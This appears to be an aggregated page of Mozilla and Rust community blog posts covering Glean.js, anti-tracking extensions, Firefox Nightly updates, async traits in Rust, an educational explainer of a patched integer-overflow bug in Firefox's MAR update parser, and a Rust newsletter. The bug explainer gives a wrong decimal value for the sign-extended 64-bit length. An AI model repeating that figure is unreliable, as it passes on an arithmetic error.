However, the stakes are completely different when implementing a proof-of-concept library and a library to be used in production environments. Whereas for the proof-of-concept we wanted to try out as many platforms as possible, for the actual Glean.js library we want to minimize unnecessary work and focus on perfecting the features our users will actively benefit from. That meant, up until a few weeks ago, Glean.js supported browser extensions and Qt/QML apps. Today, that means it also supports Node.js environments.

🎉 (Of course, it’s always exciting to implement new features).

If you would also like to start using Glean.js in your Node.js project today, checkout the “Adding Glean to your JavaScript project” guide over in the Glean book, but note that there is one caveat: the Node.js implementation does not contain persistent storage, which means every time the app is restarted the state is reset and Glean runs as if it were the first run ever of the app. In the spirit of not implementing things that are not required, we spoke to the users that requested Node.js support and concluded that for their use case persistent storage was not necessary. If your use case does require that, leave a comment over on Bug 1728807 and we will re-prioritize that work.

:brizental

Firefox Add-on ReviewsTop anti-tracking extensions

The truth of modern tracking is that it happens in so many different and complex ways it’s practically impossible to ensure absolute tracking protection. But that doesn’t mean we’re powerless against personal data harvesters attempting to trace our every online move. There are a bunch of browser extensions that can give you tremendous anti-tracking advantages… 

Privacy Badger

Sophisticated and effective anti-tracker that doesn’t require any setup whatsoever. Simply install Privacy Badger and right away it begins the work of finding the most hidden types of tackers on the web. 

Privacy Badger actually gets better at tracker blocking the more you use it. As you naturally navigate around the web and encounter new types of hidden trackers, Privacy Badger will find and block them—unreliant on externally maintained block lists or other methods that may lag behind the latest trends in sneaky tracking. Privacy Badger also automatically removes tracking codes from outgoing links on Facebook and Google. 

Decentraleyes

Another strong privacy protector that works well right out of the box, Decentraleyes effectively halts web page tracking requests from reaching third party content delivery networks (i.e. ad tech). 

A common issue with other extensions that try to block tracking requests is they also sometimes break the page itself, which is obviously not a great outcome. Decentraleyes solves this unfortunate side effect by injecting inert local files into the request, which protects your privacy (by distributing generic data instead of your personal info) while ensuring web pages don’t break in the process. Decentraleyes is also designed to work well with other types of content blockers like ad blockers.

ClearURLs

Ever noticed those long tracking codes that often get tagged to the end of your search result links or URLs on product pages from shopping sites? All that added guck to the URL is designed to track how you interact with the link. ClearURLs automatically removes the tracking clutter from links—giving you cleaner links and more privacy. 

Other key features include…

  • Clean up multiple URLs at once
  • Block hyperlink auditing (i.e. “ping tracking”; a method websites use to track clicks)
  • Block ETag tracking (i.e. “entity tags”; a tracking alternative to cookies)
  • Prevent Google and Yandex from rewriting search results to add tracking elements
  • Block some common ad domains (optional)

Disconnect

Strong privacy tool that fares well against hidden trackers used by some of the biggest data trackers in the game like Google, Facebook, Twitter and others, Disconnect also provides the benefit of significantly speeding up page loads simply by virtue of blocking all the unwanted tracking traffic. 

Once installed, you’ll find a Disconnect button in your browser toolbar. Click it when visiting any website to see the number of trackers blocked (and where they’re from). You can also opt to unblock anything you feel you might need in your browsing experience. 

Cookie AutoDelete

Take control of your cookie trail with Cookie AutoDelete. Set it so cookies are automatically deleted every time you close a tab, or create safelists for select sites you want to preserve cookies. 

After installation, you must enable “Auto-clean” for the extension to automatically wipe away cookies. This is so you first have an opportunity to create a custom safelist, should you choose, before accidentally clearing away cookies you might want to keep. 

There’s not much you have to do once you’ve got your safelist set, but clicking the extension’s toolbar button opens a pop-up menu with a few convenient options, like the ability to wipe away cookies from open tabs or clear cookies for just a particular domain.

<figcaption>Cookie AutoDelete’s pop-up menu gives you accessible cookie control wherever you go online. </figcaption>

Firefox Multi-Account Containers

Do you need to be simultaneously logged in to multiple accounts on the same platform, say for instance juggling various accounts on Google, Twitter, or Reddit? Multi-Account Containers can make your life a whole lot easier by helping you keep your many accounts “contained” in separate tabs so you can easily navigate between them without a need to constantly log in/out. 

By isolating your identities through containers, your browsing activity from one container isn’t correlated to another—making it far more difficult for these platforms to track and profile your holistic browsing behavior. 

Facebook Container

Does it come as a surprise that Facebook tries to track your online behavior beyond the confines of just Facebook? If so, I’m sorry to be the bearer of bad news. Facebook definitely tries to track you outside of Facebook. But with Facebook Container you can put a privacy barrier between the social media giant and your online life outside of it. 

Facebook primarily investigates your interests outside of Facebook through their various widgets you find embedded ubiquitously about the web (e.g. “Like” buttons or Facebook comments on articles, social share features, etc.) 

<figcaption>Social widgets like these give Facebook and other platforms a sneaky means of tracking your interests around the web.</figcaption>

The privacy trade we make for the convenience of not needing to sign in to Facebook each time we visit the site (because it recognizes your browser as yours) is we give Facebook a potent way to track our moves around the web, since it can tell when you visit any web page embedded with its widgets. 

Facebook Container basically allows you the best of both worlds—you can preserve the convenience of not needing to sign in/out of Facebook, while placing a “container” around your Facebook profile so the company can’t follow you around the web anymore.

We hope one of these anti-tracker extensions provides you with a strong new layer of security. Feel free to explore more powerful privacy extensions on addons.mozilla.org

Firefox NightlyThese Weeks in Firefox: Issue 101

Highlights

    • We have begun to roll out fission to a fraction of users on the release channel! Here’s a reminder of what Fission is, and why it matters
      • Telemetry so far doesn’t show any problems with stability or performance. We’re keeping an eye on it.
    • Fluent milestone 1 is 100% completed! All DTDs have been removed from browser.xhtml!
        • A burndown chart for strings in browser.xhtml. No remaining DTDs
          • Caption: A burndown chart for strings in browser.xhtml. No remaining DTDs left.
    • A new group of students from Michigan State University are working on improvements to High Contrast Mode. See the High Contrast Mode section below for details. Thanks to Noah, Shao, Danielle, Avi, and Jack!
    • about:processes is a page that you can go to to see which Firefox processes are taking up power and memory on your machine
      • It’s now possible to record a performance profile for a process with only a single click from within about:processes!
      • Here’s an animated GIF demonstrating a example workflow of one-click profiling
    • The new tab redesign has officially graduated. The pref to enable the pre-89 design has been removed.
    • Experimental improvements to macOS video power consumption will land soon in bug 1653417.
      • Fullscreen Youtube video on macOS consumes only 80% of the power it otherwise would.
      • We’re looking for testers! Flip gfx.core-animation.specialize-video to test. We’re looking specifically for visual glitches in the video or its controls. We’d also like to confirm that power usage is reduced for fullscreen YouTube and Twitch videos.

Friends of the Firefox team

Introductions/Shout-outs

    • [mconley] Welcome Yasmin Shash and Hanna Jones!
    • [vchin] Welcome to Amir who has started as Desktop Integrations EM!

For contributions from September 8th to September 21st 2021, inclusive.

Resolved bugs (excluding employees)

Fixed more than one bug

    • Antonin Loubiere
    • Itiel

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

WebExtensions Framework

Downloads Panel

Fluent

    • Milestone 1 has been completed! All DTDs have been removed from browser.xhtml!
      • As a bonus, this also means that all DTDs have been removed from the startup path, which was a goal for Milestone 2!
      • Are We Fluent Yet?
      • Congratulations to Katherine and Niklas for finally getting us over this milestone!

Form Autofill

High-Contrast Mode (MSU Capstone project)

Lint, Docs and Workflow

macOS Spotlight

    • Window spotlight buttons will now be on the correct side in RTL builds: bugs 1633860 & 1419375.
    • We noticed some users unfamiliar with macOS conventions were running Firefox directly from its DMG file. This can result in data loss and slow startup times, since Firefox is not fully installed. We now show a message warning the user in this scenario (bug 516362).

New Tab Page

    • New tab redesign has officially graduated. Old design pref & related code removed. Bug 1710937 👏
    • CSS variables simplified & cleanup. Allowing for easier theming (bug 1727319, 1726432, 1727321)
    • The ntp_text theme API property was broken, and now it isn’t! (bug 1713778)

Nimbus / Experiments

    • Bug 1730924 We want to update the Ajv JSON schema validator in tree

Password Manager

PDFs & Printing

Performance

    • Gijs has filed some bugs to make process flipping less likely when Fission is enabled
    • We’ve been seeing a slow but steady decline in the percentage of clients on Nightly seeing tab switch spinners. This might be related to Fission, WebRender, hardware churn, or might be a measurement artifact due to old builds sending telemetry. We’re not sure.
    • Thanks to jstutte for landing a patch that removes some main thread IO during startup when checking if we need to be doing an LMDB migration!

Performance Tools

    • Thanks to our contributor, mhansen, Linux perf profiles now include different colors for kernel vs user stack frames.
    • Two side-by-side images of performance profiles. The right side now has bright colors

      Caption: Two side-by-side images of performance profiles. The right side now has bright colors

Proton

Search and Navigation

    • Firefox Suggest is a new feature we’re working on to help you find the best of the web more quickly and easily!
    • Drew enabled the Firefox Suggest offline scenario for en-* users in the US region and made some tweaks to the Address Bar preferences UI
    • Daisuke fixed a regression where the Address Bar was not providing switch-tab results when history results were disabled – Bug 1477895

Screenshots

Niko MatsakisDyn async traits, part 1

Over the last few weeks, Tyler Mandry and I have been digging hard into what it will take to implement async fn in traits. Per the new lang team initiative process, we are collecting our design thoughts in an ever-evolving website, the async fundamentals initiative. If you’re interested in the area, you should definitely poke around; you may be interested to read about the MVP that we hope to stabilize first, or the (very much WIP) evaluation doc which covers some of the challenges we are still working out. I am going to be writing a series of blog posts focusing on one particular thing that we have been talking through: the problem of dyn and async fn. This first post introduces the problem and the general goal that we are shooting for (but don’t yet know the best way to reach).

What we’re shooting for

What we want is simple. Imagine this trait, for “async iterators”:

trait AsyncIter {
    type Item;
    async fn next(&mut self) -> Option<Self::Item>;
}

We would like you to be able to write a trait like that, and to implement it in the obvious way:

struct SleepyRange {
    start: u32,
    stop: u32,
}

impl AsyncIter for SleepyRange {
    type Item = u32;
    
    async fn next(&mut self) -> Option<Self::Item> {
        tokio::sleep(1000).await; // just to await something :)
        let s = self.start;
        if s < self.stop {
            self.start = s + 1;
            Some(s)
        } else {
            None
        }
    }
}

You should then be able to have a Box<dyn AsyncIter<Item = u32>> and use that in exactly the way you would use a Box<dyn Iterator<Item = u32>> (but with an await after each call to next, of course):

let b: Box<dyn AsyncIter<Item = u32>> = ...;
let i = b.next().await;

Desugaring to an associated type

Consider this running example:

trait AsyncIter {
    type Item;
    async fn next(&mut self) -> Option<Self::Item>;
}

Here, the next method will desugar to a fn that returns some kind of future; you can think of it like a generic associated type:

trait AsyncIter {
    type Item;

    type Next<'me>: Future<Output = Self::Item> + 'me;
    fn next(&mut self) -> Self::Next<'_>;
}

The corresponding desugaring for the impl would use type alias impl trait:

struct SleepyRange {
    start: u32,
    stop: u32,
}

// Type alias impl trait:
type SleepyRangeNext<'me> = impl Future<Output = u32> + 'me;

impl AsyncIter for InfinityAndBeyond {
    type Item = u32;
    
    type Next<'me> = SleepyRangeNext<'me>;
    fn next(&mut self) -> SleepyRangeNext<'me> {
        async move {
            tokio::sleep(1000).await;
            let s = self.start;
            ... // as above
        }
    }
}

This desugaring works quite well for standard generics (or impl Trait). Consider this function:

async fn process<T>(t: &mut T) -> u32
where
    T: AsyncIter<Item = u32>,
{
    let mut sum = 0;
    while let Some(x) = t.next().await {
        sum += x;
        if sum > 22 {
            break;
        }
    }
    sum
}

This code will work quite nicely. For example, when you call t.next(), the resulting future will be of type T::Next. After monomorphization, the compiler will be able to resolve <SleepyRange as AsyncIter>::Next to the SleepyRangeNext type, so that the future is known exactly. In fact, crates like embassy already use this desugaring, albeit manually and only on nightly.

Associated types don’t work for dyn

Unfortunately, this desugaring causes problems when you try to use dyn values. Today, when you have dyn AsyncIter, you must specify the values for all associated types defined in AsyncIter. So that means that instead of dyn AsyncIter<Item = u32>, you would have to write something like

for<'me> dyn AsyncIter<
    Item = u32, 
    Next<'me> = SleepyRangeNext<'me>,
>

This is clearly a non-starter from an ergonomic perspective, but is has an even more pernicious problem. The whole point of a dyn trait is to have a value where we don’t know what the underlying type is. But specifying the value of Next<'me> as SleepyRangeNext means that there is exactly one impl that could be in use here. This dyn value must be a SleepyRange, since no other impl has that same future.

Conclusion: For dyn AsyncIter to work, the future returned by next() must be independent of the actual impl. Furthermore, it must have a fixed size. In other words, it needs to be something like Box<dyn Future<Output = u32>>.

How the async-trait crate solves this problem

You may have used the async-trait crate. It resolves this problem by not using an associated type, but instead desugaring to Box<dyn Future> types:

trait AsyncIter {
    type Item;

    fn next(&mut self) -> Box<dyn Future<Output = Self::Item> + Send + 'me>;
}

This has a few disadvantages:

  • It forces a Box all the time, even when you are using AsyncIter with static dispatch.
  • The type as given above says that the resulting future must be Send. For other async fn, we use auto traits to analyze automatically whether the resulting future is send (it is Send it if it can be, in other words; we don’t declare up front whether it must be).

Conclusion: Ideally we want Box when using dyn, but not otherwise

So far we’ve seen:

  • If we desugar async fn to an associated type, it works well for generic cases, because we can resolve the future to precisely the right type.
  • But it doesn’t work for doesn’t work well for dyn trait, because the rules of Rust require that we specify the value of the associated type exactly. For dyn traits, we really want the returned future to be something like Box<dyn Future>.
    • Using Box does mean a slight performance penalty relative to static dispatch, because we must allocate the future dynamically.

What we would ideally want is to only pay the price of Box when using dyn:

  • When you use AsyncIter in generic types, you get the desugaring shown above, with no boxing and static dispatch.
  • But when you create a dyn AsyncIter, the future type becomes Box<dyn Future<Output = u32>>.
    • (And perhaps you can choose another “smart pointer” type besides Box, but I’ll ignore that for now and come back to it later.)

In upcoming posts, I will dig into some of the ways that we might achieve this.

Mozilla Attack & DefenseFixing a Security Bug by Changing a Function Signature

 

Or: The C Language Itself is a Security Risk, Exhibit #958,738

This post is aimed at people who are developers but who do not know C or low-level details about things like sign extension. In other words, if you’re a seasoned pro and you eat memory safety vulnerabilities for lunch, then this will all be familiar territory for you; our goal here is to dive deep into how integer overflows can happen in real code, and to break the topic down in detail for people who aren’t as familiar with this aspect of security.

The Bug

In July of 2020, I was sent Mozilla bug 1653371 (later assigned CVE-2020-15667). The reporter had found a segfault due to heap overflow in the library that parses MAR files1, which is the custom package format that’s used in the Firefox/Thunderbird application update system. So that doesn’t sound great. (spoiler: it isn’t as bad as it sounds because that overflow happens after the MAR file has had its signature validated already)

The Fix

The patch I wrote for this bug consists entirely of changing one function signature in a C source file from this:

static int mar_insert_item(MarFile* mar, const char* name, int namelen,
                           uint32_t offset, uint32_t length, uint32_t flags)

to this:

static int mar_insert_item(MarFile* mar, const char* name, uint32_t namelen,
                           uint32_t offset, uint32_t length, uint32_t flags)

I swear that is the entire patch. All I had to do was change the type of one of this function’s parameters from int to uint32_t. Can that change really fix a security bug? It can, and it did, and I’ll explain how. We have some background to cover first, though.

Background

The problem here comes down to numbers and how computers work with them, so let’s talk a bit about that first2. Since the bug is in a file written in the C language, our discussion will be from that perspective, but I am going to try to explain things so that you don’t need to know C or much at all about low-level programming in order to understand what happened.

Binary Numbers

Any number that your computer is going to work with has to be stored in terms of binary bits. The way those work isn’t as complicated as it might seem.

Think about how you write a number in decimal digits using place value. If we want to write the number one thousand, three hundred, and twelve, we need four digits: 1,312. What does each one of those digits mean? Well the rightmost 2 means… 2. But the 1 next to that doesn’t mean 1, it means 10. You take the digit itself and multiply that by 10 to get the value that’s being represented there. And then as you go through the rest of the digits, you go up by another power of 10 for each one. The 3 doesn’t mean either 3 or 30, it means 300, because it’s being multiplied by 100. And the leftmost 1 gets multiplied by 1000.

Guess what? Binary numbers work the same way. The only difference is, since binary only has two different digits, 0 and 1, it doesn’t make any sense to use powers of 10; there’d be loads of numbers we couldn’t write, anything greater than 1 but less than 10 couldn’t be represented. So instead of that, we use powers of 2. Each successive digit isn’t multiplied by 1, 10, 100, 1000, etc., it’s multiplied by 1, 2, 4, 8, etc.

Let’s look at a couple of examples. Here’s the number twelve in binary: 1100. Why? Well, let’s do the same thing we did with our decimal example, multiply each digit. I’ll write out the whole thing this time:

1100
│││└─ 0 x (2 ^ 0) = 0 x 1 = 0
││└── 0 x (2 ^ 1) = 0 x 2 = 0
│└─── 1 x (2 ^ 2) = 1 x 4 = 4
└──── 1 x (2 ^ 3) = 1 x 8 = 8

0 + 0 + 4 + 8 = 12

There we go! We got 12. For each digit, we multiply its value by the power of 2 for that place value location (and the multiplication is pretty darn easy, because the only digits are 0 and 1), and then add up all those results. That’s it!

Binary Addition

Now, what if we need to do some math? That’s pretty much all computers are any good at, after all. Let’s say we want to add something to a binary number.

Well, we know how to do that in decimal: you add up each digit starting from the lowest one and carry over into the next digit if necessary. If you read the last section, you can probably guess what I’m about to say: that’s exactly what you do in binary too. Except again it’s even easier because there’s only two different digits.

Let’s have another simple example, 13 + 12. First we have to write both of those numbers in binary; we already know 12 is 1100, so 13 should just be one more than that, 1101. We’ll add them up the same way we add decimal numbers by hand:

  1100
+ 1101
------
 ?????

The first two digits are easy, 0 + 1 = 1, and 0 + 0 = 0.

  1100
+ 1101
------
 ???01

But now we have 1 + 1. Where do we go with that? There’s no 2. Well, just like in decimal, we have to carry out of that digit; the sum of 1 and 1 in binary is 10 (because that’s just binary for 2), so that means we need to write a 0 in that column and carry the 1.

  1
  1100
+ 1101
------
 ??001

Only one digit to go. Again, it’s 1 + 1, but now we have a 1 carried over from the previous digit. So really we have to do 1 + 1 + 1, which is 3 but in binary that’s 11. This is the last column now, so we don’t have to worry about carries anymore, we can just write that down:

  1
  1100
+ 1101
------
 11001

And we’re done! 1100 + 1101 = 11001. And to prove we got the right answer, let’s convert 11001 back to decimal, the same way we did before:

11001
││││└ 1 x (2 ^ 0) = 1 x  1 =  1
│││└─ 0 x (2 ^ 1) = 0 x  2 =  0
││└── 0 x (2 ^ 2) = 0 x  4 =  0
│└─── 1 x (2 ^ 3) = 1 x  8 =  8
└──── 1 x (2 ^ 4) = 1 x 16 = 16

1 + 0 + 0 + 8 + 16 = 25

So now we know we were right; 12 + 13 = 25, and 1100 + 1101 = 11001. That’s how you add numbers in binary.

Signed Integers and Two’s Complement

So far we’ve only talked about positive numbers, but that’s not all computers can handle; sometimes you also need negative numbers. But you don’t want every number to potentially be negative; a lot of the kinds of things that you need to keep track of in a program just cannot possibly be negative, and sometimes (as we’ll see) allowing certain things to be negative can be actively harmful.

So, computers (and many languages, including C) provide two different kinds of integers that the programmer can select between whenever they need an integer: “signed” or “unsigned”. “Signed” means that the number can be either negative or positive (or zero), and “unsigned” means it can only be positive (or zero)3.

What we’ve been talking about up to now are unsigned integers, so how do signed integers work? To start with, the first bit of the number isn’t part of the number itself anymore, it’s now the “sign bit”. If the sign bit is 0, the number is nonnegative (either zero or positive), and if the sign bit is 1, the number is negative. But, when the sign bit is 1, we need a couple extra steps to convert between binary and decimal. Here’s the procedure.

  1. Discard the sign bit before doing anything else.
  2. Invert all the other bits in the number, meaning make every 1 a 0 and vice versa.
  3. Convert that binary number (the one with the bits flipped) to decimal the usual way.
  4. Add 1 to that result.

This operation, with the inversion and the adding 1, is called “two’s complement”, and it’ll get you the value of the negative number. Let’s go through another simple example.

Let’s say we have a signed 8-bit integer and the value is 11010110. What is that in decimal? Well, we see right away that the sign bit is set, so we need to take the two’s complement. First, we need to flip all the bits except the sign bit, so that gets us 0101001. Now we convert that to decimal and add 1.

0101001
││││││└ 1 x (2 ^ 0) = 1 x  1 =  1
│││││└─ 0 x (2 ^ 1) = 0 x  2 =  0
││││└── 0 x (2 ^ 2) = 0 x  4 =  0
│││└─── 1 x (2 ^ 3) = 1 x  8 =  8
││└──── 0 x (2 ^ 4) = 0 x 16 =  0
│└───── 1 x (2 ^ 4) = 1 x 32 = 32
└──────

1 + 0 + 0 + 8 + 0 + 32 = 41

41 + 1 = 42

Now just remember to add back the negative sign, and we get -42. That’s our number! 11010110 interpreted as a signed integer is -42.

Why?

Why do we bother with any of this? Why not do something simple like have the sign bit and then just the regular number4? Well, the two’s complement representation has one huge advantage: you can completely disregard it while doing basic arithmetic. The exact same hardware and logic can do arithmetic on both unsigned numbers and signed two’s complement numbers5. That means the hardware is simpler, which means it’s smaller, cheaper, and faster. That mattered more in the early days of digital computers, which is why two’s complement caught on as the standard, and it’s still with us today.

Sign Extension

There’s one other neat trick two’s complement let’s us do that we need to talk about. Integers in computers have a fixed “width”, or number of bits that are used to represent them. Wider integers can represent larger (or more negative) numbers, but take up more space in the computer’s memory. So to balance those concerns, languages like C give the programmer access to a few different bit widths to choose from for their integers.

So, what happens if we need to do some arithmetic between integers that are different widths, or just pass an integer into a function that’s narrower than the function expects? We need a way to make an integer wider. If it’s unsigned, that’s easy; copy over the same value into the lower (right-hand) bits and then fill in the new high bits with 0’s, and you’ll have the same value, just now with more bits.

But what if we need to widen a signed integer? Two’s complement’s here to save the day with a solution called “sign extension”. It turns out all we have to do to make a two’s complement integer wider is copy over the same value into the low bits and then fill in the new high bits with copies of the sign bit. That’s it.

It’s easy to see why that’s correct if we think about how two’s complement works. If the number is positive (the sign bit is 0), then it’s the same as for an unsigned number, we’ll fill in the new space with all zeroes and nothing changes. And if the number is negative (the sign bit is 1), then we’ll fill in the new space with 1 bits, but the two’s complement operation means those bits all get inverted into 0’s when we need to get the number’s value, so still nothing changes. These simple, efficient operations are why two’s complement is so neat, despite seeming weird and overcomplicated at first.

Hexadecimal Numbers

I’m going to use a few hexadecimal numbers in this article, but don’t worry, I’m not going to try to teach you how to work in a whole different number system yet again. You can think of hexadecimal as a shorthand for binary numbers. Hexadecimal (“hex” for short) uses the decimal digits 0-9 and also the letters A-F, for 16 possible digits total. Since each digit can have 16 values, each one can stand in for four binary digits.

Also, hex numbers in C and elsewhere are written starting with 0x. That’s not part of the number, it’s just telling you that the thing after it is written in hex so that you know how to read it.

You don’t need to know how to do any arithmetic directly on hex numbers or anything like that, just see how they convert to binary bits. Here’s the conversions of individual hex digits to binary bits:

Binary  Hex
======  ===
 0000    0
 0001    1
 0010    2
 0011    3
 0100    4
 0101    5
 0110    6
 0111    7
 1000    8
 1001    9
 1010    A
 1011    B
 1100    C
 1101    D
 1110    E
 1111    F

Implicit Conversions in C

In C, unlike some languages, there are a bunch of different types that represent different ways of storing numbers; basically, every kind and size of number that CPU’s can work with has its own type in C. There’s also a “default” integer type, which is called int. How many bits are in an int depends on the C compiler you’re using (and on its settings)6, but it is guaranteed by the language standard to be signed.

Since C has so many different kinds of numbers, it’s common to need to convert between them. It’s so common in fact that the language designers decided to make those conversions mostly automatic. That means that, for instance, this code compiles and runs as you’d probably expect:

#include <math.h> // to get the declaration for sqrt()

long long geometric_mean(int a, int b) {
  return sqrt(a * b);
}

int main() {
  int a = 42;
  long b = 13;
  double mean = geometric_mean(a, b);
  return mean;
}

Even though none of the types in that code match up at all, the compiler just makes everything work for us. Nice of it, eh? These automatic “fixes” are called implicit conversions, and the rules for how they work are long and not always very intuitive. This is a pretty major gotcha of C programming, because it happens without the programmer even seeing it, you just have to know these things are happening and realize all the implications.

How the Bug Works

That should be all the background we need to understand what went wrong here. Now, let’s have another look back at that original, unpatched function declaration:

static int mar_insert_item(MarFile* mar, const char* name, int namelen,
                          uint32_t offset, uint32_t length, uint32_t flags)

The first two parameters are an internal data structure and a text string, they aren’t relevant here. But after that we see an int parameter, which is meant to contain the length of the string parameter (in C, strings don’t know their own length, the programmer has to keep track of that if they need it).

A few lines into the mar_insert_item function, we find this call:

memcpy(item->name, name, namelen + 1);

I’ll explain what this line is for before we move on. The mar_insert_item function is part of a procedure that reads the index of all the files contained in the MAR package (it’s kind of like a ZIP file, it can contain a bunch of different files and compress them all, and you can extract the whole thing or just individual files). mar_insert_item is called repeatedly, once for each compressed file, and each call adds one entry to the index that’s being gradually built up. This specific line just copies the file’s name into that index entry; memcpy of course is short for “memory copy”, and its parameters are the destination to copy to (which is the name field of the item we’re adding to our index), the source to copy from (the name string was passed into mar_insert_item in the first place), and the amount of memory that needs to be copied, in bytes. That last parameter is where everything goes wrong.

What do you think would happen if mar_insert_item is called with namelen set to the highest positive value it can store, which is 0x7fffffff? Well then, in this one line of code, the program does all of these things:

  1. A 1 gets added to namelen7. But I just said namelen already has the highest positive value it can store, so something has to give. The C language standard doesn’t define what happens in this case, but in practice what you get on most computers is… the addition just happens anyway. So we get the value 0x80000000. But namelen is a signed integer, and that value has its sign bit set! We’ve added 1 to a positive number and it transformed into a negative number. -2,147,483,648 to be precise8. Computers are weird. And we’re not even done yet.
  2. memcpy takes a 64-bit value, so our temporary value has to get extended from 32 bits to 64. That means a sign extension; we take the most significant bit, which is a 1, and copy it into 32 new bits, getting us the value 0xFFFFFFFF80000000. Remember, sign extension preserves the two’s complement value, so the decimal version of that number is still -2,147,483,648, it didn’t change during this step.
  3. The length parameter that memcpy takes is also supposed to be unsigned, so now that the value has been extended to 64 bits, we take those bits and interpret them as an unsigned number. We no longer have -2,147,483,648, we now have positive 9,223,372,036,854,775,807. As a byte length, that’s over a trillion terabytes9. Fair to say that’s more bytes than we could have really meant to be copying here.
  4. Finally, memcpy is called, and it starts trying to copy from name into item->name. But because of that sign extension and unsigned reinterpretation, we can see that it’s going to try to copy waaaaay more bytes than are actually there. So what memcpy ends up doing is copying all the bytes that are there (memcpy does its best for us even when we feed it junk), and then… crashing the program.

And that’s the bug; the updater crashes right here.

How the Fix Works

Now, with all that background, the fix makes perfect sense. Changing the parameter’s type means that the conversion to unsigned happens at the time mar_insert_item is called, and at that point the value being passed in is still a positive number, so converting it then is harmless (in fact it’s just nothing, that operation doesn’t do anything at all at that point). And then the + 1 is done to an unsigned number, so it’s harmless too, and there’s no sign extension to ever do because the thing being passed to memcpy is no longer signed. Everything gets a lot simpler to understand, and simultaneously more correct.

Takeaways

Don’t Use C

Implicit conversions are a misfeature. What they give you in convenience is more than erased by the potential for invisible bugs. More recently designed languages tend to be more strict about this sort of thing, Rust for instance just doesn’t have these kinds of implicit conversions at all, but C is from the 1970’s and It Made Sense At The Time™. But in C these things can’t really be avoided, they’re baked into the language. I’d very much recommend using another language for any new programs you work on, for this and a variety of other reasons10.

Layers of Security

This bug wasn’t exploitable in practice, partly because it’s just in an awkward place to exploit, but also because Firefox requires update files to be digitally signed by Mozilla or they won’t be read (beyond the minimum needed to check the signature), much less applied. That means that anybody wanting to attack Firefox users via this bug would also have to compromise Mozilla’s build infrastructure and use it to sign their own malicious MAR file. Having that additional layer of security makes most issues surrounding MAR files much much less concerning.

You Can Do Systems Programming

Something I’ve hoped to get across (and I acknowledge this may not be the ideal topic to make this point, but it’s an important point to me) is that low-level (“systems”) programming isn’t magic or really special in any way. It’s true there’s a lot going on and there’s lots of little details, but that’s true for any kind of programming, or anything else involving computers at all to be honest. Everything involved here was invented and built by people, and it can all be broken down and understood. And that’s the message I want to sign off with: you can do systems programming. It’s not too hard. It’s not too complicated. It’s not limited to just “experts”. You are smart and capable and you can do the thing.


1. A fair question to ask here would be why we even have our own package format. There’s a few reasons and you can read the original discussion from back when the format was first introduced if you’re interested, but the main benefit nowadays is that we’re able to locate and validate the package’s signature before really having to parse anything else. In fact, the bug that this post is about doesn’t get hit until after the MAR file has passed signature validation, so it could only be exploited using either a properly signed MAR or a custom build of Firefox/Thunderbird/whatever other application that disables MAR signing. ↩︎

2. I’m only going to talk about integers, because numbers that have a decimal or fraction part work very differently (and can be implemented a few different ways), and they aren’t relevant here. ↩︎

3. You almost never need numbers that can only be either negative or zero, so neither hardware nor languages generally support those, you’d just have to use a signed integer in that case. ↩︎

4. That is a real thing called signed magnitude and it is used for certain things, but not standard integers in modern computers. ↩︎

5. If you’re curious about the math that explains why this is the case, I’ll direct you to Wikipedia’s proof; I’ve spent enough time in the weeds for one blog post already. ↩︎

6. Theoretically int is meant to be whatever size the computer hardware you’re compiling your program for finds most convenient to work with (its “word size”), so it would be 32 bits on a 32-bit CPU and 64 bits on a 64-bit CPU. In practice though, for backwards compatibility reasons, int is usually 32 bits on all but pretty specialized hardware. It’s best never to depend on int being any particular size and to use the type that specifically represents a particular size if you need to be sure; for instance if you know you need exactly 32 bits, use int32_t, not int. ↩︎

7. If you don’t know C, you might be wondering what the + 1 is even for. It’s a little out of scope for this post, but in short, since as we mentioned earlier C strings don’t keep track of their length, if you don’t store that length off somewhere (and typically you don’t), you need some other way to find where the string ends. That’s done by adding one character made up of all zero bits to the end of the string, called a “null terminator”, so when you’re reading a string and you encounter a null character, then you know the string is over. Most C coding conventions have you leave the terminator out of the length, so whenever you’re doing something that needs to account for the terminator (like copying it, because then you have to copy the terminator also), you have to add 1 to the length so that you have space for it. C programming is full of fiddly details like this. ↩︎

8. This problem shows up so often and is such a common source of security bugs that it gets its own name, integer overflow. On Wikipedia you’ll find lots of famous examples and different ways to combat the issue. ↩︎

9. AKA one yottabyte. I swear that is really what it’s called. ↩︎

10. Yes, I acknowledge there are certain circumstances where you really must write things in C, or maybe C++ if you’re lucky. If you have one of those situations, then you already know whatever I could tell you. If you don’t, then don’t use C. And don’t @ me. ↩︎

This Week In RustThis Week in Rust 410

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is miette, a library for error handling that is beautiful both in code and output.

Thanks to Kat Marchán for the self-suggestion!

Please submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from the Rust Project

265 pull requests were merged in the last week

Rust Compiler Performance Triage

The largest story for the week are the massive improvements that come from enabling the new pass manager in LLVM which leads to consistent 5% to 30% improvements across almost all test cases. The regressions were mostly minor with clear paths for addressing the ones that were not made with some specific trade off in mind.

Triage done by @rylev. Revision range: 7743c9..83f147

4 Regressions, 4 Improvements, 3 Mixed; 0 of them in rollups

43 comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in the final comment period.

Tracking Issues & PRs
New RFCs

No new RFCs were proposed this week.

Upcoming Events

Online
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Enso

Stockly

Timescale

ChainSafe

Kraken

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

This week we have two great quotes!

The signature of your function is your contract with not only the compiler, but also users of your function.

Quine Dot on rust-users

Do you want to know what was harder than learning lifetimes? Learning the same lessons through twenty years of making preventable mistakes.

Zac Burns in his RustConf talk

